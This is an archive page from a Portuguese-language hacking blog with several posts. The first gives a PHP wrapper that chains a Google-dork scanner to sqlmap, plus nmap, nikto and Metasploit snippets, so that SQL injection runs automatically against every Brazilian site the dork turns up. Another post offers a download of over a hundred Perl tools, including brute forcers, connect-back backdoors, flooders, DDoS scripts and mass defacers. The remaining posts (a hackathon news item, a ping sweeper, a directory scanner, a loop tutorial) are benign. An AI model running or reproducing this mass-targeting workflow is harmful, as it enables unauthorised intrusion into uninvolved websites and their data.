Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador programação. Mostrar todas as postagens
Mostrando postagens com marcador programação. Mostrar todas as postagens

segunda-feira, 16 de março de 2015

Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.
  1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
  2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.
Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.
  • Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
  • Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.
Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;


?>


Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:
Comando INURLBR: Se deseja usar filtro em motores de busca: ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"  Execução:
Comando executado:
./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:
$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command$dados);
$command = "nikto -h {$target}";
system($command$dados).empty($dados[0]) ? exit() : NULL;


Exemplo usando msfcli do metasploit  - Hunting For MSSQL:
$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";
system($command$dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed


Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.


BAIXAR SCRIPT SCANNER INURLBR


REF'S:
hunting for MSSQL

msfcli-basics tutorial

msfcli provides a powerful command-line interface to the framework.

quinta-feira, 27 de novembro de 2014

Hackers usam tecnologia para combater violência contra a mulher

Hackers usam tecnologia para combater violência contra a mulher


Hackers, programadores e especialistas em assuntos relacionados a gênero começaram nesta terça-feira (25) a trabalhar efetivamente nos 22 aplicativos que vão usar tecnologias digitais para traduzir dados públicos de maneira útil e acessível a qualquer pessoa.

Reunidos no Salão Branco da Câmara dos Deputados, eles participam da 2ª edição do Hackathon - espécie de maratona colaborativa que desafia desenvolvedores de soluções digitais. Neste ano, os 47 participantes deverão criar aplicativos para ampliar a transparência de dados públicos sobre “violência contra a mulher” e sobre “políticas públicas de gênero e cidadania”.

Uma dos projetos de aplicativo, por exemplo, pretende fornecer informações úteis sobre a violência obstétrica, que envolve agressões físicas ou emocionais de gestantes por parte dos profissionais da área da saúde.

“Nosso objetivo é criar um aplicativo para celular que permita às mulheres se informar sobre o que é a violência obstétrica, como se proteger e também para incentivar o parto humanizado”, explica a Marcela Oliveira, que veio de Maceió para participar do Hackthon. Segundo ela, a ferramenta vai funcionar como uma espécie de rede social, permitindo que as próprias mulheres possam compartilhar informações e experiências com outras gestantes.

Especialistas

Coordenador do evento, Cristiano Ferri destaca que a novidade da edição deste ano é a participação de especialistas de outras áreas, como sociólogos e antropólogos, que já pensam e discutem a questão de gênero. “Como esses jovens são especialistas em questões de gênero e dominam as mágicas da tecnologia muito bem, vão conseguir facilitar a compreensão de dados importantes utilizando aplicativos e até jogos”, disse.

Para a coordenadora de Acesso à Justiça e Combate à Violência da Secretaria de Diretos da Mulher da Presidência da República, Aline Yamamoto, eventos como o Hackathon podem resultar em ferramentas importantes no combate a problemas sérios, como a violência contra a mulher.

“Essa iniciativa de aplicativo cria uma rede de apoio às mulheres e é uma forma de mostrar como podem buscar seus diretos e quais são os serviços que podem atendê-las nas áreas de saúde, justiça e assistência social”, apontou. Segundo Yamamoto, o Brasil ocupa atualmente a 7ª posição no ranking de países com maior número de assassinatos e mortes violentas de mulheres.

Tecnologia

A deputada Rosane Ferreira (PV-PR) defendeu o potencial das tecnologias digitais como meios de acesso à informação. “Hoje não dá para dispensar a linguagem da internet. É uma linguagem universal, que permeia todas as classes sociais. É mais um instrumento de enfrentamento contra a violência de gênero e contra a violência doméstica que assolam o nosso País”, afirmou.

Outro aplicativo em desenvolvimento nesta semana é o Myrthes, que cria uma rede social para troca de informações entre mulheres vítimas de violência e advogados. Conforme Mônica Monteiro, que participa do grupo responsável pelo aplicativo, a ideia é que as mulheres possam tirar dúvidas e se orientar sobre o que fazer caso a caso. “O objetivo é instruir as mulheres para incentivá-las a criar o hábito de denunciar”, apontou.

Mônica Monteiro acrescentou que o grupo estuda parcerias com universidades e com advogados que já são engajados na defesa dos direitos da mulher.

O Hackthon se encerra na sexta-feira (28) e vai premiar os autores dos dois projetos vencedores com passagem e hospedagem para participar de um encontro sobre projetos de Democracia Digital na sede do Banco Mundial, em Washington, nos Estados Unidos.

Fonte:http://agenciapatriciagalvao.org.br/violencia/hackers-usam-tecnologia-para-combater-violencia-contra-mulher/

quinta-feira, 16 de janeiro de 2014

PERL SCRIPTS MEGA COLLECTIONS FOR HACKING

Um belo pacote para exploit e escudos.
Um belo pacote para exploit e escudos.



Lista
1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan – Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. netBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL – Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. bluetooth hacking tool
57. SQL insertion crawler
58. binary scanner
59. POP3 Crack (bruteforce)
60. openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server’s list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. connect and send commands to remote iport. the tor network is used for anonymity.
106. port scanner sweeper.
107. rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP’s of visiors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5::Reverse
114. wordlist tool by mousepad

Baixar: PACOTE

segunda-feira, 19 de novembro de 2012

Script para listagem de diretórios em Python




                                 

Este script é escrito em Python. Ele scaneia webservers à procura de diretórios comuns, administrativos e shells em php. O script é bem fácil de ser usado.

Via Terminal entre na pasta onde você extraiu o arquivo e digite (como root):
# python scanner.py

Logo depois vai aparecer a imagem que está nesse post ali em cima.

Logo depois digite a URL desejada. É importante lembrar que precisa especificar se é http ou https, caso o contrário o script não vai funcionar.


Exemplo do menu do script:


Os logs ficam na pasta /logs/.

Esse script foi testado utilizando proxychains no Ubuntu 12.10.

Para download, clique aqui.

Bons estudos!

sexta-feira, 30 de março de 2012

Scanner de ip simples para fins de estudo

Scanner de ip simples para fins de estudo

Feito em C#.

Code..:






using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.NetworkInformation;
using System.Globalization;


namespace Scanner
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }


        public IPAddress ip;
        public PingReply pr;
        public string ip1;
        public Ping ping;
        private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
        {


            for (int i = Convert.ToInt32(txtStart.Text); i <= Convert.ToInt32(txtEnd.Text); i++)
            {
                try
                {
                    if (backgroundWorker1.CancellationPending == true)
                    {
                        e.Cancel = true;
                        break;
                    }
                    else
                    {


                        ip1 = (txtIp.Text + "." + i.ToString());
                        ip = IPAddress.Parse(ip1);


                        ping = new Ping();
                        pr = ping.Send(ip, 5);
                        backgroundWorker1.ReportProgress(i);
                    }
                }
                catch
                {


                }


            }
        }
        private void backgroundWorker1_ProgressChanged(object sender, ProgressChangedEventArgs e)
        {
            if (pr.Status.ToString() == "Success")
            {
                resultsListView.Items.Add(ip1);
            }


            try { this.progressBar1.Value = e.ProgressPercentage; }
            catch { this.progressBar1.Maximum += 1; }
        }
        private void btStart_Click(object sender, EventArgs e)
        {
            progressBar1.Value = 0;
            progressBar1.Maximum = Convert.ToInt32(txtEnd.Text);
            backgroundWorker1.RunWorkerAsync();


        }
        private void btCancelar_Click(object sender, EventArgs e)
        {
            if (backgroundWorker1.WorkerSupportsCancellation == true)
            {


                backgroundWorker1.CancelAsync();
            }
        }
        private void backgroundWorker1_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e)
        {
            MessageBox.Show("Scanner Terminou!");
        }
    }
}








Ferramentas Visual Studio:  http://www.microsoft.com/visualstudio/11/pt-br/downloads


Baixar Código fonte:  http://Baixar/Scanner.rar


Baixar Programa: http://Baixar/Scanner_exe.rar
Necessário para rodar .NET Framework 3.5 

terça-feira, 10 de janeiro de 2012

Aprenda a programa $Part - 09

Bem vindo algoritmizeiros…
Parece que foi ontem que começamos nossa série de posts sobre algoritmos, na tentativa de fazer esse mundo melhor com mais programadores =D
Agora, no nono post da série, vamos aprender sobre estruturas de repetição.

Bom, até o momento, sempre fizemos algoritmos lineares, ou seja, ele possui um começo, meio e fim, e segue essa ordem…
As estruturas de repetição, irão repetir determinados comandos, até que uma comparação lógica se torne verdadeira ou falsa.
Vou explicar com exemplos, assim o entendimento se tornará mais fácil.
O Algoritmo abaixo, lê o nome e a nota de três provas de três alunos diferentes…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Algoritmo "MediaHarmonica"
 
var
a, b, c, MH: real
nome: caractere
 
inicio
 
escreva ("Entre com o nome do aluno: ")
leia (nome)
escreval ("Entre com as notas das três provas")
escreva ("Digite a primeira nota: ")
leia (a)
escreva ("Digite a segunda nota: ")
leia (b)
escreva ("Digite a terceira nota: ")
leia (c)
MH <- 3/(1/a + 1/b +1/c)
escreval ("A média harmônica do aluno: ", NOME, " é ", MH)
escreva ("Entre com o nome do aluno: ")
leia (nome)
escreval ("Entre com as notas das três provas")
escreva ("Digite a primeira nota: ")
leia (a)
escreva ("Digite a segunda nota: ")
leia (b)
escreva ("Digite a terceira nota: ")
leia (c)
MH <- 3/(1/a + 1/b +1/c)
escreval ("A média harmônica do aluno: ", NOME, " é ", MH)
escreva ("Entre com o nome do aluno: ")
leia (nome)
escreval ("Entre com as notas das três provas")
escreva ("Digite a primeira nota: ")
leia (a)
escreva ("Digite a segunda nota: ")
leia (b)
escreva ("Digite a terceira nota: ")
leia (c)
MH <- 3/(1/a + 1/b +1/c)
escreval ("A média harmônica do aluno: ", NOME, " é ", MH)
 
fimalgoritmo

Ainda bem que só tínhamos três alunos…
E se fosse uma turma de 40 alunos?
Para isso vamos utilizar estruturas de repetição =)

Na estrutura repita – ate, todos os comandos serão executados e, ao final, haverá uma expressão lógica, para que avalie a repetição, esta que somente irá cessar quando essa expressão for verdadeira.
1
2
3
4
// sintaxe da estrutura de repetição
repita
    
ate
Agora um exemplo didático…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
algoritmo "DemonstraRepeticao"
 
var
i: inteiro
 
inicio
 
i <- 1
repita
    escreva(i)
    i <- i + 1
ate i > 10
 
fimalgoritmo
Este algoritmo irá retornar na tela do usuário os números: 1 2 3 4 5 6 7 8 9 10

Mais porquê?

Primeiramente foi declarado a variável i como inteiro, logo em seguida utilizamos uma estrutura de repetição, o repita-ate, pedimos para escrever o valor de i e acrescentamos ao seu valor mais uma unidade, ou seja, i + 1.

e até quando isso será repetido?

Até que o valor de i seja maior que 10…
Então quando o valor de i chegou a 11, ele perguntou se i era maior que 10, como a resposta foi verdadeira, ele encerrou a repetição e foi para o próximo comando…
Como não temos mais nada, encerramos nosso algoritmo.

Só que dessa vez, nós teremos 40 alunos em nossa classe!

Não! Agora que já sabemos utilizar uma estrutura de repetição, vamos poupar trabalho e resumir nosso algoritmo!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Algoritmo "MediaHarmonica"
 
var
a, b, c, MH, i: real
NOME: caractere
 
inicio
 
i <- 1
Repita
    escreva("Entre com o nome do aluno: ")
    leia(nome)
    escreval ("Entre com as notas das três provas")
    escreva("Digite a primeira nota: ")
    leia(a)
    escreva("Digite a segunda nota: ")
    leia(b)
    escreva("Digite a terceira nota: ")
    leia(c)
    MH <- 3/(1/a + 1/b +1/c)
    escreval("A média harmônica do aluno: ", NOME, " é ", MH)
    i <- i + 1
ate i > 40
 
FimAlgoritmo